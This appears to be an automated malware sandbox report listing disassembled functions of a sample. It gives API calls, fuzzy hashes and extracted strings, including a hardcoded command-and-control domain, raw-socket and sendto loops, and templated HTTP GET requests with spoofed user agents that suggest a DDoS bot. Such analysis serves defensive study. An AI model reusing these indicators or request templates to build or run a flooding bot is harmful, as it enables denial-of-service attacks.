Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
String ID:
API String ID: 964154963-0
Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9

Function 0040484F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00001F9A), ref: 00404861

Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B

socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
closesocket.WS2_32(00000000), ref: 0040489A

Strings

chinagov.8800.org, xrefs: 00404867

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcclosesocketconnectgethostbynamehtonsinet_addrsocket
String ID: chinagov.8800.org
API String ID: 1138879652-2288617695
Opcode ID: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
Opcode Fuzzy Hash: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D

Function 004051E3 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 004051F9
Sleep.KERNELBASE(00000064), ref: 00405207

Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD

atoi.MSVCRT(?,?), ref: 0040521C
Sleep.KERNELBASE(00000064), ref: 0040522D
CreateThread.KERNELBASE(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
String ID:
API String ID: 3108282239-0
Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5

Function 00405182 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00405198
Sleep.KERNELBASE(00000064), ref: 004051A6

Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD

atoi.MSVCRT(?,?), ref: 004051BB
Sleep.KERNELBASE(00000064), ref: 004051CC
CreateThread.KERNELBASE(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
String ID:
API String ID: 3108282239-0
Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9

Function 004036C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403706
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 0040371F
recv.WS2_32(00000000,?,00000008,00000000), ref: 00403738

Strings

Defghi Klmnopqr Tuv, xrefs: 004036D3

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: recvselect
String ID: Defghi Klmnopqr Tuv
API String ID: 741273618-1553144822
Opcode ID: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
Opcode Fuzzy Hash: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58

Function 004037EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040382A
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 00403843
recv.WS2_32(00000000,?,00000008,00000000), ref: 0040385C

Strings

Defghi Klmnopqr Tuv, xrefs: 004037F7

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: recvselect
String ID: Defghi Klmnopqr Tuv
API String ID: 741273618-1553144822
Opcode ID: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
Instruction ID: 0644feca00c3923390fafb838483ae5f7d21c05a749549fcef03ec3df5c1d209
Opcode Fuzzy Hash: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
Instruction Fuzzy Hash: 5E11D6B26002146BDB20AF69CDC9FDB3EECAB04391F004675BA19F61D0D3B4CE8087A4

Function 0040507D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
_localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
wsprintfA.USER32 ref: 004050BD

Strings

%04d%02d%02d, xrefs: 004050B5

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: _localtime32timewsprintf
String ID: %04d%02d%02d
API String ID: 1589165986-2607228566
Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5

Function 004034E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004034FC
LoadLibraryA.KERNELBASE(?), ref: 0040350C

Strings

hra%u.dll, xrefs: 004034F6

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadwsprintf
String ID: hra%u.dll
API String ID: 2341783205-640331709
Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99

Function 00404044 Relevance: 4.5, APIs: 3, Instructions: 22networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
connect.WS2_32(00000000,?,00000010), ref: 0040405E
closesocket.WS2_32(00000000), ref: 0040406A

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
Instruction ID: ece53a1abfa9a1dc296c5e5858b9221d35fcadf656f3c6bdee4a2ab28144fa03
Opcode Fuzzy Hash: 704ec3d58031ae9566a14cd635759ccef3e5688480f9d65bb8d4a30476373885
Instruction Fuzzy Hash: AEE08C30A0052077E22023285D4AFEA3A18AF097B0F900722F735F91E1D7755800429A

Function 00403492 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: Ioctlsetsockopt
String ID:
API String ID: 1903391676-0
Opcode ID: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
Instruction ID: 0a608003f12cb1d16ace490882b1a903705aebf6f6dc81f323932ad210811262
Opcode Fuzzy Hash: ed409dae48886ca97f11c84a6ab00aa046e863856f39508a752c3b793d34e51f
Instruction Fuzzy Hash: 49F01CB5500209BEFB119F50DD09FAA3B6CEB04708F008125BE05E91D0D7B496488B94

Function 00402A92 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
Instruction ID: 64dc199527a0429f388a9fd382f518a580a3f98e4aa8d30c949afc931af75c40
Opcode Fuzzy Hash: 1499fcb644ca70f17a514ae5522f0da01c8a4b91eeac3f71c21a923c145b40a4
Instruction Fuzzy Hash: C5E012F6A0425C7BEF609668DD86FC5B7B8A754704F0004F2E789B60D0D6F06ACD8E55

Function 004030FD Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 0040310B

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
Instruction ID: 5b36b277475b3b2f29725254a5d092a25ff950edcda12b5ed3701cdde0b1e55c
Opcode Fuzzy Hash: 5bf4f389a55ba3d56e94b3af9fbd44d165b497852bd63959914ec1e092303f7a
Instruction Fuzzy Hash: ADB002B6514381BFFB41DFA09E18C3BBAADFB94301B054C19B9D1D1524D7358868DB35

Function 00405336 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00005244,00000000), ref: 00405341

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
Instruction ID: 317f5d7f5b6160c4595255c7946ecd39f0252e0528535c85dd973ab848fd640b
Opcode Fuzzy Hash: 994779acdd13945076b11be33b1db5ce95c1c4d32d58db4b2fc17c908424ab8f
Instruction Fuzzy Hash: 95A00120BC474066ED6066606E4BF052520AB52F46F2001A5B2467D4E445E420418D5A

Non-executed Functions

Function 00407470 Relevance: 165.6, APIs: 71, Strings: 23, Instructions: 1065libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 004074A4
GetProcAddress.KERNEL32(00000000), ref: 004074AD
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 004074BB
GetProcAddress.KERNEL32(00000000), ref: 004074BE
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004074CE
GetProcAddress.KERNEL32(00000000), ref: 004074D1
socket.WS2_32(00000002,00000003,000000FF), ref: 004075A9
inet_addr.WS2_32 ref: 0040764A
sendto.WS2_32(?,?,00000033,00000000,?,00000010), ref: 0040789E
RtlExitUserThread.NTDLL(00000000), ref: 004078E3
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407904
GetProcAddress.KERNEL32(00000000), ref: 0040790B
wsprintfA.USER32 ref: 0040799E
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407A07
Sleep.KERNEL32(000007D0), ref: 00407A12
TerminateProcess.KERNEL32(?,00000000), ref: 00407A1B
Sleep.KERNEL32(0000000A), ref: 00407A1F
RtlExitUserThread.NTDLL(00000000), ref: 00407A25
wsprintfA.USER32 ref: 00407A7B
send.WS2_32(00000000,?,?,00000000), ref: 00407ACE
Sleep.KERNEL32(00000032,?,00000000), ref: 00407AD9
RtlExitUserThread.NTDLL(00000000), ref: 00407AE4
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket,?,00000001,00000000,76F90F00), ref: 00407B04
GetProcAddress.KERNEL32(00000000), ref: 00407B0B
wsprintfA.USER32 ref: 00407B90

Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C73
Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C84
Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C95

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407C17
Sleep.KERNEL32(00001388), ref: 00407C26
TerminateProcess.KERNEL32(?,00000000), ref: 00407C33
wsprintfA.USER32 ref: 00407C6C
wsprintfA.USER32 ref: 00407C91

Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2

send.WS2_32(00000000,?,?,00000000), ref: 00407D69
Sleep.KERNEL32(0000000A,?,00000000), ref: 00407D70
RtlExitUserThread.NTDLL(00000000), ref: 00407D7A
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00407DAA
GetProcAddress.KERNEL32(00000000), ref: 00407DB3
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00407DC1
GetProcAddress.KERNEL32(00000000), ref: 00407DC4
socket.WS2_32(00000002,00000002,00000000), ref: 00407E2A
sendto.WS2_32(00000000,?,-00000800,00000000,?,00000010), ref: 00407EA5
Sleep.KERNEL32(00000005), ref: 00407EB7
RtlExitUserThread.NTDLL(00000000), ref: 00407ECD
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407EF4
GetProcAddress.KERNEL32(00000000), ref: 00407EFB
wsprintfA.USER32 ref: 00407F74
wsprintfA.USER32 ref: 00407FB6
send.WS2_32(00000000,?,?,00000000), ref: 00408010
Sleep.KERNEL32(00000032,?,00000000), ref: 00408019
RtlExitUserThread.NTDLL(00000000), ref: 0040801F
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00408044
GetProcAddress.KERNEL32(00000000), ref: 0040804B
wsprintfA.USER32 ref: 004080B3
wsprintfA.USER32 ref: 004080CF

Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B

Part of subcall function 00408680: socket.WS2_32(00000002,00000001,00000000), ref: 0040868A

send.WS2_32(00000000,?,?,00000000), ref: 00408110
Sleep.KERNEL32(00000005,?,00000000), ref: 00408119
RtlExitUserThread.NTDLL(00000000), ref: 00408126
LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
GetProcAddress.KERNEL32(00000000), ref: 00408176
LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
GetProcAddress.KERNEL32(00000000), ref: 00408188
LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
GetProcAddress.KERNEL32(00000000), ref: 0040819D
LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
GetProcAddress.KERNEL32(00000000), ref: 004081AF
LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
GetProcAddress.KERNEL32(00000000), ref: 004081C1
LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
GetProcAddress.KERNEL32(00000000), ref: 004081D6
LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
GetProcAddress.KERNEL32(00000000), ref: 004081E8

Strings

E, xrefs: 0040760C
GET %s HTTP/1.1Host: %s, xrefs: 00407C66
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 004080C9
GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00407A4F
gethostname, xrefs: 004081DB
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407FB0
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407F6E
WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 00407BC9
GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407CD0
a, xrefs: 004075FF
D, xrefs: 00407B9D
%s %s%s, xrefs: 00407998, 00407B8A
a, xrefs: 004075F7
WSAStartup, xrefs: 004074C0, 004081A2
htons, xrefs: 00407482, 00407DA0, 0040817B
GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00407A6E
GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407D13
WSASocketA, xrefs: 004081C9
GET %s HTTP/1.1Host: %s:%d, xrefs: 00407C8B
setsockopt, xrefs: 004074AF, 00407DB5, 00408190
gethostbyname, xrefs: 0040815D

Memory Dump Source

Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_v5.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$wsprintf$Sleep$ExitThreadUser$Processsend$socket$CreateTerminateinet_addrsendto$gethostbyname
